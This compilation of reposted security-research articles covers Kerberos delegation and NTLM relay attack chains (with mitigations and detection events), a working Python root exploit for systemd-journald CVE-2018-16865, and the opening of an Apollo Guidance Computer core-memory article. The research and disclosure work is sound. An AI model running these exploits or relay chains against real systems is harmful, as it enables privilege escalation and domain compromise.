4. The attacker uses Service A credentials/TGT to perform a full S4U attack and obtains a forwardable TGS for the victim to Service B.
5. The attacker uses Service B credentials/TGT to invoke S4U2Proxy with the forwardable TGS from the previous step, and obtains a TGS for the victim to time/Service C.
6. The attacker can modify the service class of the resulting TGS, for example from “time” to “cifs”, because the service name is not protected.
7. The attacker can pass-the-ticket to gain access to Service C.

The following diagram illustrates this scenario:

Video demonstration of this scenario: https://youtu.be/y37Eo9zHib8

Unconstrained Domain Persistence

Once attackers compromise the domain, they can obviously configure resource-based constrained delegation on strategic objects, such as domain controllers, and obtain a TGS on-demand. But resource-based constrained delegation can also be configured to generate TGTs on-demand as a domain persistence technique. Once the domain is compromised, resource-based constrained delegation can be configured from a compromised account to the krbtgt account to produce TGTs.

The abuse case would work as follows:

1. The attacker compromises the domain and an account that has an SPN or creates one (“Service A”).
2. The attacker configures resource-based constrained delegation from Service A to krbtgt.
3. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS for an arbitrary user to krbtgt, which is, in fact, a TGT.
4. The attacker can use the TGT to request a TGS to arbitrary services.

The following diagram illustrates this scenario:

Video demonstration of this scenario: https://youtu.be/1BU2BflUHxA

In this scenario, the account Service A obtained a degree of power somewhat similar to that of the KDC, in the sense that it can produce a TGT for arbitrary users. Arguably, more subtle persistence can be achieved through a new access control entry (ACE) that allows configuring resource-based constrained delegation on-demand, rather than leaving it in plain sight.
Thinking Outside the Box: RCE/LPE Opportunities

As shown above, if an attacker can compromise a host with unconstrained delegation, RCE can be achieved with “the printer bug” and S4U2Self. But unconstrained delegation is not a trivial condition, so I attempted to come up with an attack chain that does not require unconstrained delegation.

As mentioned above, every resource has the rights to configure resource-based constrained delegation for itself, which can be done via LDAP. This primitive opens the door to RCE/LPE opportunities if an attacker is in a position to perform a successful NTLM relay of a computer account authentication to LDAP.

The abuse case would work as follows:

1. The attacker compromises an account that has an SPN or creates one (“Service A”).
2. The attacker triggers a computer account authentication using a primitive such as “the printer bug”.
3. The attacker performs an NTLM relay of the computer account (“Service B”) authentication to LDAP on the domain controller.
4. The attacker configures resource-based constrained delegation from Service A to Service B.
5. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS to Service B for a user that has local administrator rights on that host.
6. The attacker can pass-the-ticket and gain RCE/LPE, depending on the primitive used to trigger the computer account authentication.

The above scenario is straightforward and too good to be true. However, the reality is that NTLM relay is more complicated than it seems.

NTLM Relay 101

NetNTLM is a challenge-response authentication protocol designed by Microsoft for Windows environments. In the NetNTLM protocol, three messages are exchanged:

1. The client sends a NEGOTIATE message to request authentication and “advertise capabilities”.
2. The server sends a CHALLENGE message that contains a random 8-byte nonce.
3. The client sends an AUTHENTICATE message that contains a response to the challenge. The response is calculated using a cryptographic function with a key derived from the user’s password (the NTLM hash).

The server validates the response to the challenge. If it is valid, authentication is successful. Otherwise, authentication fails.

The protocol is susceptible to the following relay attack:

1. An attacker in a man-in-the-middle position waits for an incoming NEGOTIATE message from a victim.
2. The attacker relays the NEGOTIATE message to the target server.
3. The target server sends a CHALLENGE message to the attacker.
4. The attacker relays the CHALLENGE message to the victim.
5. The victim generates a valid AUTHENTICATE message and sends it to the attacker.
6. The attacker relays the valid AUTHENTICATE message to the target server.
7. The target server accepts the AUTHENTICATE message and the attacker is authenticated successfully.

The following diagram illustrates an NTLM relay attack:

The NetNTLM protocol does not only provide authentication, but can also facilitate a session key exchange for encryption (“sealing”) and signing. The client and the server negotiate whether sealing/signing is required through certain flags in the exchanged messages. The exchanged session key is RC4-encrypted using a key derived from the client’s NTLM hash. The client obviously holds the NTLM hash and can decrypt it. However, a domain member server does not hold the NTLM hash of domain users, but only of local users.
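To make the key derivations above concrete, the following sketch computes an NTLMv2 response and the session base key the way MS-NLMP specifies them. It is self-contained with made-up inputs; note that MD4 may be missing from newer OpenSSL builds, in which case a pure-Python MD4 implementation is needed:

```python
import hashlib
import hmac
import os

def ntlmv2_response(password, user, domain, server_challenge, client_blob):
    nt_hash = hashlib.new("md4", password.encode("utf-16-le")).digest()
    # ResponseKeyNT = HMAC-MD5(NT hash, UPPERCASE(user) + domain)
    response_key = hmac.new(nt_hash,
                            (user.upper() + domain).encode("utf-16-le"),
                            "md5").digest()
    # NTProofStr = HMAC-MD5(ResponseKeyNT, ServerChallenge + client blob)
    nt_proof = hmac.new(response_key, server_challenge + client_blob, "md5").digest()
    # The session base key (from which signing/sealing keys derive) is
    # HMAC-MD5(ResponseKeyNT, NTProofStr): a relaying attacker who lacks
    # the NT hash can forward the response but never recover this key.
    session_base_key = hmac.new(response_key, nt_proof, "md5").digest()
    return nt_proof + client_blob, session_base_key

response, key = ntlmv2_response("Passw0rd!", "victim", "CONTOSO",
                                os.urandom(8), os.urandom(28))
print(response.hex(), key.hex())
```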
When a domain user exchanges a session key with a member server, the member server uses the Netlogon RPC protocol to validate the client’s response to the challenge with a domain controller, and if a session key was exchanged, then the key to decrypt it is calculated by the domain controller and provided to the member server. This separation of knowledge ensures that the member server does not obtain the NTLM hash of the client, and the domain controller does not obtain the session key.

If the client and server negotiate a session key for signing, an attacker performing a relay attack can successfully authenticate, but will not be able to obtain the session key to sign subsequent messages, unless the attacker can obtain one of the following:

- the NTLM hash of the victim;
- credentials for the computer account of the target server;
- a compromised domain controller.

However, if the attacker obtains any of the above, they do not need to perform an NTLM relay attack to compromise the target host or impersonate the victim, and this is the reason signing mitigates NTLM relay attacks.

NTLM Relay 102

The goal is to perform a successful relay, without negotiating signing or encryption, from any protocol to LDAP. Most of the primitives I am aware of for eliciting a connection from a computer account are initiated by the SMB client or the RPC client, both of which always seem to negotiate signing. If signing was negotiated in the NTLM exchange, the LDAP service on domain controllers ignores all unsigned messages (tested on Windows Server 2016 and Windows Server 2012R2).

The most obvious next move is to reset the flags that negotiate signing during the NTLM relay. However, Microsoft introduced a MIC (Message Integrity Code) to the NTLM protocol to prevent that. The MIC is sent by the client in the AUTHENTICATE message, and it protects the integrity of all three NTLM messages using HMAC-MD5 with the session key. If a single bit of the NTLM messages had been altered, the MIC would be invalid and authentication would fail.

Not all clients support MIC, such as Windows XP/2003 and prior, and so it is not mandatory. So another thing to try would be omitting the MIC during the NTLM relay. However, there is a flag that indicates whether a MIC is present or not, and that flag is part of the “salt” used when calculating the NetNTLM response to the challenge. Therefore, if the MIC is removed and the corresponding flag is reset, then the NetNTLM response will be invalid and authentication will fail.

Reflective NTLM Relay is Dead

Traditionally, NTLM relay of computer accounts was performed reflectively, meaning from a certain host back to itself. Until MS08-068, it was commonly performed to achieve RCE by relaying from SMB to SMB. After that was patched, reflective cross-protocol NTLM relay was still possible, and was most commonly abused to achieve LPE in attacks such as Hot Potato. Cross-protocol reflective relay was patched in MS16-075, which killed reflective relays for good (or until James Forshaw brings it back). Rotten Potato/Juicy Potato is still alive and kicking, but it is a different flavour of reflective relay, as it abuses local authentication, which ignores the challenge-response.

Post MS16-075, many security researchers stopped hunting for primitives that elicit computer account authentication, because without reflection they were no longer valuable.
Viable NTLM Relay Primitives for RCE/LPE

An RCE/LPE primitive would require one of the following:

- A client that does not negotiate signing, such as the web client on all Windows versions, including WebDAV clients.
- A client that does not support MIC in NTLM messages, such as Windows XP/2003 and prior.
- An LDAP service on a domain controller that supports resource-based constrained delegation but does not ignore unsigned messages or does not verify the MIC. I don’t believe that this unicorn exists.

There are different primitives for triggering the computer account to authenticate over HTTP. Some of them were abused in Hot Potato. I chose to explore those that take an arbitrary UNC path and then trigger a WebDAV client connection. Note that on Windows servers, the WebDAV client is not installed by default. On Windows Server 2012R2 and prior, the Desktop Experience feature is required, and on Windows Server 2016 or later, the WebDAV Redirector feature is required. However, on desktops, the WebDAV client is installed by default.

As I mentioned above, it seems that some researchers no longer care for such primitives. However, as Lee Christensen (@tifkin_) demonstrated with the combination of “the printer bug” and unconstrained delegation, and as I will demonstrate below, these primitives are still exploitable, and I encourage everyone to keep hunting for them (and tell me all about it when you find them).

Getting Intranet-Zoned

By default, the web client will only authenticate automatically to hosts in the intranet zone, which means that no dots can be present in the hostname. If the relay server already has a suitable DNS record, then this is not an issue. However, if the relay server is “rogue”, an IP address will not cut it. To overcome that, ADIDNS can be abused to add a new DNS record for the relay server, as Kevin Robertson (@NetSPI) explained in his blog post Exploiting Active Directory-Integrated DNS.

Case Study 1: MSSQL RCE/LPE

MSSQL has an undocumented stored procedure called xp_dirtree that lists the files and folders of a provided path. By default, this stored procedure is accessible to all authenticated users (“Public”). Under the following conditions, an attacker can achieve RCE/LPE (depending mainly on connectivity) by abusing the xp_dirtree stored procedure:

- The attacker has compromised a user permitted to invoke the xp_dirtree stored procedure.
- The MSSQL service is running as Network Service, Local System, or a Virtual Account (default).
- The WebDAV client is installed and running on the target host.
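As a concrete illustration of the trigger (step 3 of the abuse case that follows), the sketch below invokes xp_dirtree with a UNC path pointing at the relay host. pymssql is assumed and all names are hypothetical; the "@80" suffix is what pushes the connection to the WebDAV client (which does not negotiate signing) instead of SMB:

```python
import pymssql

conn = pymssql.connect(server="mssql01.contoso.local",
                       user="CONTOSO\\someuser", password="Passw0rd!")
cur = conn.cursor()
# List a share on the rogue WebDAV relay server; the directory listing
# itself is irrelevant -- the point is the outbound NTLM authentication.
cur.execute(r"EXEC master..xp_dirtree '\\relayhost@80\share', 1, 1")
conn.close()
```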
The abuse case would work as follows:

1. The attacker compromises credentials or a TGT for an account that has an SPN or creates one (“Service A”), and an account permitted to connect and invoke xp_dirtree on the target MSSQL instance.
2. If required, the attacker uses Service A to add a DNS record using ADIDNS.
3. The attacker logs in to the MSSQL service on the target host (“Service B”) and invokes xp_dirtree to trigger a connection to a rogue WebDAV NTLM relay server.
4. The attacker relays the computer account NTLM authentication to the LDAP service on the domain controller, and configures resource-based constrained delegation from Service A to Service B.
5. The attacker uses Rubeus to perform a full S4U attack to obtain a TGS to Service B for a user that has local administrator privileges on the target host.
6. The attacker can pass-the-ticket to compromise the target host.

The following diagram illustrates this scenario:

Video demonstration of this scenario: https://youtu.be/nL2oa3URkCs

Matt Bush (@3xocyte) implemented “Bad Sequel” as a PoC exploit for this scenario.

Case Study 2: Windows 10/2016/2019 LPE

One late night, Matt Bush (@3xocyte), Danyal Drew (@danyaldrew) and I brainstormed ideas of where to find suitable RCE/LPE primitives, and decided to explore what happens when a user changes the account picture in Windows 10/2016/2019. We analysed it with Process Monitor and quickly found that during the account picture change, SYSTEM opens the picture file to read its attributes. It is a small and meaningless operation; not an arbitrary file write/read/delete. But we are humble people, and that is all we wanted.

The abuse case would work as follows:

1. The attacker compromises credentials or a TGT for an account that has an SPN or creates one (“Service A”).
2. The attacker gains unprivileged access to another computer running Windows 10 or Windows Server 2016/2019 with the WebDAV Redirector feature installed (“Service B”).
3. If required, the attacker uses Service A to add a DNS record using ADIDNS.
4. The attacker changes the account profile picture to a path on a rogue WebDAV NTLM relay server.
5. The attacker relays the computer account NTLM authentication to the LDAP service on the domain controller, and configures resource-based constrained delegation from Service A to Service B.
6. The attacker uses Rubeus to perform a full S4U attack to obtain a TGS to Service B for a user that has local administrator privileges on it.
7. The attacker can pass-the-ticket to compromise Service B.

The following diagram illustrates this scenario:

Video demonstration of this scenario: https://youtu.be/741uz0ILxCA

Mitigating Factors

Accounts marked as sensitive for delegation or members of the Protected Users group are not affected by the attacks presented here, except for the S4U2Self abuse. However, computer accounts are affected, and in my experience they are never marked as sensitive for delegation or added to the Protected Users group. I did not thoroughly test the effects of setting computer accounts as sensitive for delegation or adding them to the Protected Users group, so I cannot recommend doing that, but I do recommend exploring it.

As Lee Christensen (@tifkin_) demonstrated in “the printer bug” abuse case study at DerbyCon 8, obtaining a TGT/TGS for a domain controller allows performing “dcsync” and compromising the domain. As demonstrated above, with resource-based constrained delegation, obtaining a TGT for any computer account allows impersonating users to it and potentially compromising the host. Therefore, it is important not to configure any host for unconstrained delegation, because it can facilitate the compromise of other hosts within the forest and within other forests with bidirectional trust.

LDAP signing with channel binding can mitigate the RCE and LPE attack chains described in the case studies above.

The RCE/LPE attack chains that involve NTLM relay to LDAP abuse a default ACE that permits Self to write msDS-AllowedToActOnBehalfOfOtherIdentity. Adding a new ACE that denies Self from writing to the attribute msDS-AllowedToActOnBehalfOfOtherIdentity will interrupt these attack chains, which will then have to fall back to abusing that primitive in conjunction with unconstrained delegation.
If your organisation does not use resource-based constrained delegation, you can consider adding an ACE that blocks Everyone from writing to the attribute msDS-AllowedToActOnBehalfOfOtherIdentity.

Detection

The following events can be used in the implementation of detection logic for the attacks described in this post:

- S4U2Self: can be detected in a Kerberos service ticket request event (Event ID 4769), where the Account Information and Service Information sections point to the same account.
- S4U2Proxy: can be detected in a Kerberos service ticket request event (Event ID 4769), where the Transited Services attribute in the Additional Information is not blank.
- Unconstrained Domain Persistence: the domain persistence technique described above can be detected in a Kerberos service ticket request event (Event ID 4769), where the Transited Services attribute in the Additional Information is not blank (indicating S4U2Proxy), and the Service Information points to the “krbtgt” account.
- msDS-AllowedToActOnBehalfOfOtherIdentity: if an appropriate SACL is defined, then resource-based constrained delegation configuration changes can be detected in directory service object modification events (Event ID 5136), where the LDAP Display Name is “msDS-AllowedToActOnBehalfOfOtherIdentity”. Events where the subject identity and the object identity are the same may be an indicator for some of the attacks presented above.

A Word of Advice from Microsoft

Microsoft did highlight the risk of S4U2Proxy in section 5.1 of MS-SFU:

“The S4U2proxy extension allows a service to obtain a service ticket to a second service on behalf of a user. When combined with S4U2self, this allows the first service to impersonate any user principal while accessing the second service. This gives any service allowed access to the S4U2proxy extension a degree of power similar to that of the KDC itself. This implies that each of the services allowed to invoke this extension have to be protected nearly as strongly as the KDC and the services are limited to those that the implementer knows to have correct behavior.”

S4U2Proxy is a dangerous extension that should be restricted as much as possible. However, the introduction of resource-based constrained delegation allows any account to permit arbitrary accounts to invoke S4U2Proxy, by configuring “incoming” delegation to itself. So should we protect all accounts as strongly as the KDC?

Author

Elad Shamir (@elad_shamir) from The Missing Link Security.

Acknowledgements

- Will Schroeder (@harmj0y), Lee Christensen (@tifkin_), Matt Bush (@3xocyte), and Danyal Drew (@danyaldrew) for bouncing off ideas and helping me figure this out.
- Will Schroeder (@harmj0y) for Rubeus.
- Matt Bush (@3xocyte) for dementor.py, helping implement the WebDAV NTLM relay server, and implementing Bad Sequel.
- Lee Christensen (@tifkin_) for discovering “the printer bug” and implementing SpoolSample.
- Benjamin Delpy (@gentilkiwi) for modifying Kekeo and Mimikatz to support this research. And OJ Reeves (@TheColonial) for the introduction.
- Kevin Robertson (@NetSPI) for Powermad.
- Microsoft for always coming up with great ideas, and never disappointing.

Disclosure Timeline

- 26/10/2018 - Sent initial report to MSRC.
- 27/10/2018 - MSRC Case 48231 was opened and a case manager was assigned.
- 01/11/2018 - Sent an email to MSRC to let them know this behaviour actually conforms with the specification, but I believe it is still a security issue.
- 09/11/2018 - Sent an email to MSRC requesting an update on this case.
- 14/11/2018 - MSRC responded that they are still trying to replicate the issue.
- 27/11/2018 - Sent an email to MSRC providing a 60-day notice of public disclosure.
- 09/12/2018 - Sent a reminder email to MSRC.
- 11/12/2018 - MSRC responded that a new case manager was assigned and the following conclusion was reached: “The engineering team has determined this is not an issue which will be addressed via a security update but rather we need to update our documentation to highlight service configuration best practices and using a number of features such as group managed service accounts, resource based constrained delegation, dynamic access control, authentication policies, and ensuring unconstrained delegation is not enabled. The team is actively working on the documentation right now with the goal of having it published prior to your disclosure date.”
- 28/01/2019 - Public disclosure.

I would like to note that my first experience with MSRC was very disappointing. The lack of dialogue was discouraging and not at all what I had expected.

This post was also published on eladshamir.com.

Sursa: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
3. Exploiting systemd-journald Part 1

January 29, 2019
By Nick Gregory

Introduction

This is part one in a multipart series on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. Specifically, the vulnerabilities were:

a user-influenced size passed to alloca(), allowing manipulation of the stack pointer (CVE-2018-16865)
a heap-based memory out-of-bounds read, yielding memory disclosure (CVE-2018-16866)

The affected program, systemd-journald, is a system service that collects and stores logging data. The vulnerabilities discovered in this service allow user-generated log data to manipulate memory such that an attacker can take over systemd-journald, which runs as root. Exploitation of these vulnerabilities thus allows for privilege escalation to root on the target system.

As Qualys did not provide exploit code, we developed a proof-of-concept exploit for our own testing and verification. There are some interesting aspects that were not covered by Qualys' initial publication, such as how to communicate with the affected service to reach the vulnerable component, and how to control the computed hash value that is actually used to corrupt memory. We thought it was worth sharing the technical details for the community.

As the first in our series on this topic, the objective of this post is to provide the reader with the ability to write a proof-of-concept capable of exploiting the service with Address Space Layout Randomization (ASLR) disabled. In the interest of not posting an unreadably long blog, and also not handing sharp objects to script-kiddies before the community has had a chance to patch, we are saving some elements for discussion in future posts in this series, including details on how to control the key computed hash value. We are also considering providing a full ASLR bypass, but are weighing whether we are lowering the bar too much for the kiddies (feel free to weigh in with opinions).

As the focus of this post is on exploitation, the content is presented assuming the reader is already familiar with the initial publication's analysis of the basic nature and mechanisms of the vulnerabilities involved. The target platform and architecture we assume for this post is Ubuntu x86_64; to play along at home, we recommend using the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image.

Proof-of-Concept Attack Vector

Before we can start exploiting a service, we need to understand how to communicate with it. In the case of journald, we could use the project's own C library (excellently explained here). To ease exploitation, we need to have full control over the data sent to the target, a capability which unfortunately the journald libraries don't provide out of the box. Thus, we chose to write our exploit in Python, implementing all the required functionality from scratch. To dive deeper into how our exploit works, we need to first understand how journald clients communicate with the daemon. So let's get started!

Interacting with systemd-journald

There are three main ways userland applications can interact with journald: the syslog interface, the journald-native interface, and journald's service stdout/stdin redirection. All of these interfaces have dedicated UNIX sockets in /run/systemd/journal/. For our purposes, we only need to investigate the syslog and native interfaces, as those attempt to parse the log messages sent by programs, and are where the vulnerabilities reside.
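Since these interfaces are plain UNIX datagram sockets, no journald-specific library is needed to reach them. As a minimal, hedged sketch (socket path as on a stock systemd install), this is all it takes to speak to one of them from Python:

import socket

# journald's client interfaces are UNIX datagram sockets under /run/systemd/journal/
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.connect("/run/systemd/journal/dev-log")  # the syslog compatibility socket
sock.send(b"Test message sent straight to the socket")
sock.close()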
Syslog Interface

The syslog interface is the simplest interface to journald, being a compatibility layer for applications that aren't built with journald-specific logging. This interface is available by writing to one of the standard syslog UNIX datagram sockets such as /dev/log or /run/systemd/journal/dev-log. Any syslog messages written into them are parsed by journald (to remove the standard date, hostname, etc. added by syslog; see manpage syslog(3)) and then saved. A simple way to experiment with the parser is by sending data with netcat, and observing the output with journalctl:

$ echo 'Test Message!' | nc -Uu /dev/log
$ journalctl --user -n 1
...
Jan 23 17:23:47 localhost nc[3646]: Test Message!

Journald-Native Interface

The native interface is how journal-aware applications log to the journal. Similar to the syslog interface, this is accessed via the UNIX datagram socket at /run/systemd/journal/socket. The journald-native interface uses a simple protocol for clients to talk to the journald server over this socket, resembling a simple key/value store, and allowing clients to send multiple newline-separated entries in a single write. These entries can either be simple KEY=VALUE pairs or binary blobs. Binary blobs are formed by sending the entry field name, a newline, the size of the blob as a little-endian uint64, the contents of the blob, and a final newline, like so:

SOME_KEY
\x0a\x00\x00\x00\x00\x00\x00\x00SOME_VALUE

(Here \x0a\x00\x00\x00\x00\x00\x00\x00 is the length of "SOME_VALUE", 10, encoded as a uint64; a trailing newline follows the value.)

The native socket can also accept these entries in two different ways:

by directly sending data over the socket
by using an interesting feature of UNIX sockets, which is the ability to send a file descriptor (FD) over the socket

Datagram sockets can only handle messages of a limited size (around 0x34000 bytes in our environment) before erroring with EMSGSIZE, and this is where FD passing comes into play. We can write our messages to a temporary file, then pass journald a file descriptor for that file, giving us the ability to send messages up to journald's self-imposed 768MB limit (defined by DATA_SIZE_MAX).

Digging into FD passing a bit further, we find that journald can accept two different types of file descriptors:

normal file descriptors (see manpage fcntl(2))
sealed memfds (see manpage memfd_create(2))

Luckily, we don't need to bother with sealed file descriptors for reasons that we'll get to in a future post.

Similarly to the syslog interface, you can easily send native messages with nc:

$ echo 'MESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket
$ journalctl --user -n 1
...
Jan 23 17:39:40 localhost nc[7154]: Hello!

And to add custom entries:

$ echo 'KEY=VALUE\nMESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket
$ journalctl --user -n 1 -o json-pretty
{
    "__CURSOR" : "s=e07cdf6930884834bec282476c7b59e0;i=4e652;b=9a1272556aa440f69531842f94d8f10a;m=163757c8c8",
    "__REALTIME_TIMESTAMP" : "1548283220714394",
    "__MONOTONIC_TIMESTAMP" : "95417780424",
    ...
    "MESSAGE" : "Hello!",
    "KEY" : "VALUE",
    ...
}

Exploitation Overview

Now that we have a decent understanding of how to interact with journald, we can start writing our exploit. Since the goal of this first post is to write a PoC which works with ASLR disabled, we don't have to worry about using the syslog interface to perform a memory disclosure, and will instead jump directly into the fun of exploiting journald with CVE-2018-16865. As noted by Qualys, the user-influenced size allocated with alloca() is exploitable due to the ability to create a message with thousands, or even millions, of entries.
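To make that framing concrete before we get into the allocation math, here is a hedged sketch of helpers producing the two entry forms described above (the PoC below builds its messages the same way, just inline):

import struct

def simple_entry(key, value):
    # Plain KEY=VALUE entry, newline-terminated.
    return key + b"=" + value + b"\n"

def binary_entry(key, blob):
    # Field name, newline, little-endian uint64 length, blob, trailing newline.
    return key + b"\n" + struct.pack("<Q", len(blob)) + blob + b"\n"

# A message with "millions of entries" is just many such entries concatenated:
msg = binary_entry(b"MESSAGE", b"Hello!") + b"B=\n" * 1000000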
When these entries are appended to the journal, these messages result in a size of roughly sizeof(EntryItem) * n_entries being allocated via alloca(). Since the mechanism of alloca() to reserve memory on the stack is a simple subtraction from the stack pointer with a sub rsp instruction, our influence over this size value grants the ability to lower the stack pointer off the bottom of the stack into libc. The actual use of alloca() in the source is wrapped in a macro called newa(), and the code responsible for the vulnerable operation looks like:

items = newa(EntryItem, MAX(1u, n_iovec));

Our general approach for exploiting this vulnerability is to initially send the right size and count of entries, so as to make the stack pointer point into libc's BSS memory region, and then surgically overwrite the free_hook function pointer with a pointer to system. This grants us arbitrary command execution upon the freeing of memory with content we control.

To actually exploit this, there are two main issues we need to solve:

Sending all of the entries to journald
Controlling the data written to the stack after it has been lowered into libc

The first issue has already been addressed by our exploration of the native interface, as discussed in the previous section. From this interface we can write data to a temporary file, and then pass the FD for that file to journald, which gives us easily enough room to send the hundreds of megabytes of data needed to jump from the stack to libc.

The second issue is a bit more complex, since we don't directly control the data written to the stack after it has been lowered into libc's memory. This is because our entries are hashed prior to being written, by the function jenkins_hashlittle2 (originally written by Bob Jenkins, hence the name). Thus, exploitation requires controlling all 64 bits of output that the hash function produces, which presents a seemingly formidable problem at first. Preimaging a hash can be a daunting task; however, there are some very nice tools we can use to calculate exact preimages in under 30 seconds, since this is not a cryptographically secure hash. We'll be exploring the specifics of achieving this calculation and the tools involved in our next blog post. For the scope of this post and our initial PoC, we will be using the constants we have already computed for our Vagrant image.

Proof-of-Concept Code

Here we will begin walking through the Python code for our PoC; a link to the full script can be found at the very end. The first chunk of code is basic setup, helper functions, and a nice wrapper around UNIX sockets that will make our life easier further down the line:

#!/usr/bin/env python3
import array
import os
import socket
import struct

TEMPFILE = '/tmp/systemdown_temp'

def p64(n):
    return struct.pack('<Q', n)

class UNIXSocket(object):
    def __init__(self, path):
        self.path = path

    def __enter__(self):
        self.client = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM, 0)
        self.client.connect(self.path)
        return self.client

    def __exit__(self, exc_t, exc_v, traceback):
        self.client.close()

Next we have some constants that may change based on the particular target environment.
These constants were built for the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image (and again, these assume a target with ASLR disabled):

# Non-ASLR fixed locations for our test image
libc = 0x7ffff79e4000
stack = 0x7fffffffde60

# location of the free_hook function pointer to overwrite
free_hook = libc + 0x3ed8e8

# preimage which computes to location of the system function via hash64()
# that location is libc + 0x4f440 in our test image
system_preimage = b"Y=J~-Y',Wj(A"

# padding count to align memory
padding_kvs = 3

Now we have the bulk of the values needed for our proof-of-concept exploit. The first step in the exploit logic is to add some padding entries, which causes an increase in the size of the alloca, shifting the stacks of journal_file_append_data (and the functions it calls) further down. This is to align the precise location where data will be written in libc's BSS, and avoid unnecessarily clobbering any other libc global values, which could greatly interfere with exploitation.

with open(TEMPFILE, 'wb') as log:
    msg = b""
    for _ in range(padding_kvs):
        msg += b"P=\n"

Next, we add the preimage value, the hash of which (when computed by hash64()) will be the address of system. Specifically, the alignment of this value will be such that journald writes system into libc's __free_hook, giving us a shell when our command below is freed.

    # this is our key that when hashed gives system
    msg += system_preimage + b"\n"

Next, we append our command as a binary data block surrounded by semicolons to make sh happy. We also ensure journald is forcefully killed here so that libc has no chance of locking up after the system() call returns:

    # next is our command as a binary data block
    cmd = b"echo $(whoami) > /tmp/pwn"
    # be sure to kill journald afterwards so it doesn't lock up
    cmd = b";" + cmd + b";killall -9 /lib/systemd/systemd-journald;"

    # format as a binary data block
    msg += b"C\n"
    msg += p64(len(cmd))
    msg += cmd + b"\n"

As described by Qualys, we then send a large entry (>=128MB), which results in an error and causes journald to break out of the loop that is processing the entries (src). Once this error condition is hit and the loop is stopped, no more values are written, and so this step is important to discontinue the corruption of memory, preventing values from being written to unmapped / non-writable memory between libc and the stack.

    # Then we send a large item which breaks the loop
    msg += b"A=" + b"B"*(128*1024*1024) + b"\n"

Finally, we pad our message with enough entries to cause the stack->libc drop to happen in the first place:

    # Then fill with as many KVs as we need to get to the right addr
    num_msgs = (((stack - free_hook)//16) - 1)
    num_msgs -= 3  # the three above
    num_msgs -= 7  # added by journald itself
    msg += b"B=\n" * num_msgs
    log.write(msg)

At this point, we just need to pass the log FD to journald to get our shell:

with UNIXSocket("/run/systemd/journal/socket") as sock:
    with open(TEMPFILE, 'rb') as log:
        sock.sendmsg([b""], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                              array.array("i", [log.fileno()]))])

os.unlink(TEMPFILE)

After running this, we find the file /tmp/pwn has been created with the contents "root", meaning we have successfully achieved our privilege escalation.

$ cat /tmp/pwn
root

All Together Now

The full proof-of-concept script that works with ASLR disabled is available here.

Detection

Having a working exploit for this (and other interesting) CVEs helps us validate our zero-day detection capabilities, and when necessary, improve them.
Here, even with ASLR turned off, we detect exploitation out-of-the-box, as it is happening, through our Stack Pivot strategy (we call our detection models "strategies"), and would generally detect most payloads. With ASLR turned on, an additional strategy detects the attempt to bypass ASLR. We do all of this by looking for clear evidence of exploitation, instead of attempting to do signature scanning for IOCs associated with any specific CVE, malware family, threat actor, etc. While we can support that too, whack-a-mole isn't a good model for detection and prevention.

Sursa: https://capsule8.com/blog/exploiting-systemd-journald-part-1/
4. Inside the Apollo Guidance Computer's core memory

The Apollo Guidance Computer (AGC) provided guidance, navigation and control onboard the Apollo flights to the Moon. This historic computer was one of the first to use integrated circuits, containing just two types of ICs: a 3-input NOR gate for the logic circuitry and a sense amplifier IC for the memory. It also used numerous analog circuits built from discrete components using unusual cordwood construction.

The Apollo Guidance Computer. The empty space on the left held the core rope modules. The connectors on the right communicate between the AGC and the spacecraft.

We1 are restoring the AGC shown above. It is a compact metal box with a volume of 1 cubic foot and weighs about 70 pounds. The AGC had very little memory by modern standards: 2048 words of RAM in erasable core memory and 36,864 words of ROM in core rope memory. (In this blog post, I'll discuss just the erasable core memory.) The core rope ROM modules (which we don't have)2 would be installed in the empty space on the left. On the right of the AGC, you can see the two connectors that connected the AGC to other parts of the spacecraft, including the DSKY (Display/Keyboard).3

By removing the bolts holding the two trays together, we could disassemble the AGC. Pulling the two halves apart takes a surprising amount of force because of the three connectors in the middle that join the two trays. The tray on the left is the "A" tray, which holds the logic and interface modules. The tangles of wire on the left of the tray are the switching power supplies that convert 28 volts from the spacecraft to 4 and 14 volts for use in the AGC. The tray on the right is the "B" tray, which holds the memory circuitry, oscillator and alarm. The core memory module was removed in this picture; it goes in the empty slot in the middle of the B tray.

The AGC is implemented with dozens of modules in two trays. The trays are connected through the three connectors in the middle.

Core memory overview

Core memory was the dominant form of computer storage from the 1950s until it was replaced by semiconductor memory chips in the early 1970s. Core memory was built from tiny ferrite rings called cores, storing one bit in each core. Cores were arranged in a grid or plane, as in the highly-magnified picture below. Each plane stored one bit of a word, so a 16-bit computer would use a stack of 16 core planes. Each core typically had 4 wires passing through it: X and Y wires in a grid to select the core, a diagonal sense line through all the cores for reading, and a horizontal inhibit line for writing.4

Closeup of a core memory (not AGC). Photo by Jud McCranie (CC BY-SA 4.0).

Each core stored a bit by being magnetized either clockwise or counterclockwise. A current in a wire through the core could magnetize the core with the magnetization direction matching the current's direction. To read the value of a core, the core was flipped to the 0 state. If the core was in the 1 state previously, the changing magnetic field produced a voltage in the sense wire threaded through the cores. But if the core was in the 0 state to start, the sense line wouldn't pick up a voltage. Thus, forcing a core to 0 revealed the core's previous state (but erased it in the process). A key property of the cores was hysteresis: a small current had no effect on a core; the current had to be above a threshold to flip the core. This was very important because it allowed a grid of X and Y lines to select one core from the grid.
By energizing one X line and one Y line, each with half the necessary current, only the core where both lines crossed would get enough current to flip; the other cores would be unaffected. This "coincident-current" technique made core memory practical, since a few X and Y drivers could control a large core plane.

The AGC's erasable core memory system

The AGC used multiple modules in the B tray to implement core memory. The Erasable Memory module (B12) contained the actual cores: 32,768 cores to support 2048 words, each word being 15 bits plus a parity bit. Several more modules contained the supporting circuitry for the memory.5 The remainder of this article will describe these modules.

The erasable memory module in the Apollo Guidance Computer, with the supporting modules next to it. Image courtesy of Mike Stewart.

